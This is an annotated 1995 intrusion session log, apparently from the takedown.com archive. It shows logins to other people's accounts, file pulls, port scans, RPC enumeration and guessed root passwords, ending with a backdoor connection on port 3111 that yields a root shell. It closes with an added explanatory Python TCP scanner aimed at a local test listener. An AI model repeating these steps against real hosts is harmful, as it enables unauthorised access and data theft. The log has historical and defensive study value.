Kevin On Demand
- Spooked - kevin-on-demand.takedown.com 4024
- Start: 1995 Feb 14 11:23:54
- Total Run Time: 7:15
- From NETCOM-rtp1.netcom.net to netcom15.netcom.com.
- Frustrated that his back door on one of Netcom's machines has been closed, he tries the password ".fukhood" for the benefit of Robert Hood, should he be watching. Spooked, and moving lots of things around.
ftp
ftp> open president.oit.unc.edu
Connected to president.oit.unc.edu.
220 president FTP server (SunOS 4.1) ready.
Name (president.oit.unc.edu:gkremen): ingres
331 Password required for ingres.
Password: ali**
230 User ingres logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> bin
200 Type set to I.
ftp> mget c6*
mget c682x.tar.gz? y
200 PORT command successful.
150 Binary data connection for c682x.tar.gz (192.100.81.128,2751) (5887242 bytes
^Z
Stopped
gkremen:UNKNOWN:netcom15:/u1/gkremen:2> bg &
200 PORT command successful.
150 Binary data connection for c682x.tar.gz (192.100.81.128,2751) (5887242 bytes).
No job control in subshells.
[2] 4037
[2] Exit 1 bg
gkremen:UNKNOWN:netcom15:/u1/gkremen:3> bg
[1] sh &
gkremen:UNKNOWN:netcom15:/u1/gkremen:4> ps
PID TT STAT TIME COMMAND
3933 p8 S 0:00 -csh (csh)
3974 p8 S 0:00 sh
3990 p8 S 0:00 ftp
4044 p8 R 0:00 ps
gkremen:UNKNOWN:netcom15:/u1/gkremen:5> sh
$ cd /usr/spool/uucppublic
$ cd gkremen
$ ls -tla c*
-rw------- 1 gkremen 932940 Feb 14 11:25 c682x.tar.gz
-rw-r--r-- 1 gkremen 5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r-- 1 gkremen 10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r-- 1 gkremen 4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r-- 1 gkremen 891779 Feb 14 11:18 c68hv.tar.Z
-rw-r--r-- 1 gkremen 449033 Feb 14 11:18 cust.out.Z
$ ls -tla c*
-rw------- 1 gkremen 989880 Feb 14 11:25 c682x.tar.gz
-rw-r--r-- 1 gkremen 5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r-- 1 gkremen 10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r-- 1 gkremen 4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r-- 1 gkremen 891779 Feb 14 11:18 c68hv.tar.Z
-rw-r--r-- 1 gkremen 449033 Feb 14 11:18 cust.out.Z
$ ls -tla c*
-rw------- 1 gkremen 1119820 Feb 14 11:25 c682x.tar.gz
-rw-r--r-- 1 gkremen 5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r-- 1 gkremen 10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r-- 1 gkremen 4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r-- 1 gkremen 891779 Feb 14 11:18 c68hv.tar.Z
-rw-r--r-- 1 gkremen 449033 Feb 14 11:18 cust.out.Z
$ which ftp
/usr/ucb/ftp
$ cd /log
/log: Permission denied
$ cd /
$ ls -ld log
drwxr-x--- 11 root 4096 Jan 12 00:01 log
$ ls -ldg log
drwxr-x--- 11 root daemon 4096 Jan 12 00:01 log
$ cd
$ ./scan mail 1-512
7:echo:
9:discard:
13:daytime:
19:chargen:
23:telnet:
37:time:
111:sunrpc:
113:auth:
$ scan nntp 1-512
7:echo:
9:discard:
13:daytime:
19:chargen:
37:time:
53:domain:
111:sunrpc:
119:nntp:
$ scan netcomsv 1-512
7:echo:
9:discard:
13:daytime:
19:chargen:
21:ftp:
23:telnet:
25:smtp:
37:time:
53:domain:
111:sunrpc:
119:nntp:
$ /usr/etc/showmount -e netcomsv
netcomsv: RPC: Program not registered
$ telnet
telnet> open netcomsv
Connected to netcomsv.
Escape character is '^]'.
SunOS UNIX (netcomsv)
login: root
Password: .fukhood
Login incorrect
login: root
Password: .neill.
Login incorrect
login: root
Password: .neill.
Login incorrect
login: ingres
Password: ali**
Login incorrect
^D
login: Connection closed by foreign host.
$ finger @netcomsv
[netcomsv] connect: Connection refused
$ pwd
/u1/gkremen
$ id
uid=17988(gkremen) gid=50(users0) groups=50(users0)
$ rpc
rpc: execute permission denied
$ rpcinfo
rpcinfo: not found
$ /usr/etc/rpcinfo -p netcomsv
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100029 1 udp 662 keyserv
100024 1 udp 733 status
100024 1 tcp 735 status
100003 2 udp 2049 nfs
100021 1 tcp 739 nlockmgr
100021 1 udp 1028 nlockmgr
100021 3 tcp 743 nlockmgr
100021 3 udp 1030 nlockmgr
100020 2 udp 1031 llockmgr
100020 2 tcp 748 llockmgr
100021 2 tcp 751 nlockmgr
100021 2 udp 1032 nlockmgr
100001 2 udp 4609 rstatd
100001 3 udp 4609 rstatd
100001 4 udp 4609 rstatd
100012 1 udp 4610 sprayd
226 Binary Transfer complete.
local: c682x.tar.gz remote: c682x.tar.gz
5887242 bytes received in 2.4e+02 seconds (24 Kbytes/s)
ftp>
$ grep -v suid /etc/fstab
/dev/sd0a / 4.2 rw 1 1
/dev/sd0g /usr 4.2 ro 1 2
[1] + Stopped (tty input) sh
gkremen:UNKNOWN:netcom15:/u1/gkremen:6> fg
ftp> type
Using binary mode to transfer files.
ftp> quit
221 Goodbye.
$ pwd
/usr/spool/uucppublic/gkremen
$ ls -tla c6*
-rw------- 1 gkremen 5887242 Feb 14 11:28 c682x.tar.gz
-rw-r--r-- 1 gkremen 5562537 Feb 14 11:18 c682us.tar.Z
-rw-r--r-- 1 gkremen 4996091 Feb 14 11:18 c682f.tar.Z
-rw-r--r-- 1 gkremen 10155010 Feb 14 11:18 c682x.tar.Z
-rw-r--r-- 1 gkremen 891779 Feb 14 11:18 c68hv.tar.Z
$ file c6*
c682f.tar.Z: compressed data block compressed 16 bits
c682us.tar.Z: compressed data block compressed 16 bits
c682x.tar.Z: compressed data block compressed 16 bits
c682x.tar.gz: data
c68hv.tar.Z: compressed data block compressed 16 bits
$ chmod 644 *
$ touch *
$ cd
$ test1
test> open president.oit.unc.edu 3111
Trying 152.2.22.97 ...
Connected to president.oit.unc.edu.
Escape character is '^]'.
nm
SunOS UNIX (president)
president#
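The `scan host 1-512` tool run three times above is not included in the log; only its output format (`port:service:` per open port, one line each) is visible. The following is an added example, not the tool from the session and not code from the takedown.com archive: it reproduces that behaviour with a plain TCP connect() loop, which is the only kind of scan an unprivileged account like gkremen could run. The target here is a constructed listener on 127.0.0.1 so the example runs offline; the host name, port range and timeout are assumptions for illustration.

```python
"""Minimal TCP connect scanner in the style of the `scan host lo-hi` output
seen in the session log. Added example; the original tool is not on the page."""
import socket


def probe(host, port, timeout=0.5):
    """Return True if a full TCP connect() to host:port succeeds (port open).

    A completed three-way handshake shows up in the target's logs (inetd,
    tcp_wrappers), which is why this kind of scan is noisy from the defender's side.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except (OSError, OverflowError, ValueError):
        # refused, timed out, unreachable, or an out-of-range port number
        return False


def service_name(port):
    """Map a port to its /etc/services name; '' when unknown (the log prints an empty field)."""
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return ""


def scan(host, lo, hi, timeout=0.5):
    """Connect-scan ports lo..hi inclusive; return [(port, name), ...] for open ports."""
    lo, hi = max(lo, 1), min(hi, 65535)
    return [(p, service_name(p)) for p in range(lo, hi + 1) if probe(host, p, timeout)]


def format_scan(results):
    """Render results exactly like the log: 'port:name:' per line."""
    return "\n".join(f"{p}:{n}:" for p, n in results)


def local_listener():
    """Constructed test target: a throwaway listener on 127.0.0.1 (not a real host)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)  # backlog lets connect() complete without accept() being called
    return srv


if __name__ == "__main__":
    srv = local_listener()
    port = srv.getsockname()[1]
    # scan a small window around the constructed listener (assumed range)
    print(format_scan(scan("127.0.0.1", port - 2, port + 2)))
    srv.close()
```

Because every probe completes the handshake, each open port the scanner touches leaves a connection record on the target; the `rpcinfo -p` and `showmount -e` calls in the same session are likewise ordinary RPC requests that the portmapper host can log, so this whole sequence is visible to anyone reading the remote side's logs, which is the point the log's annotator was making.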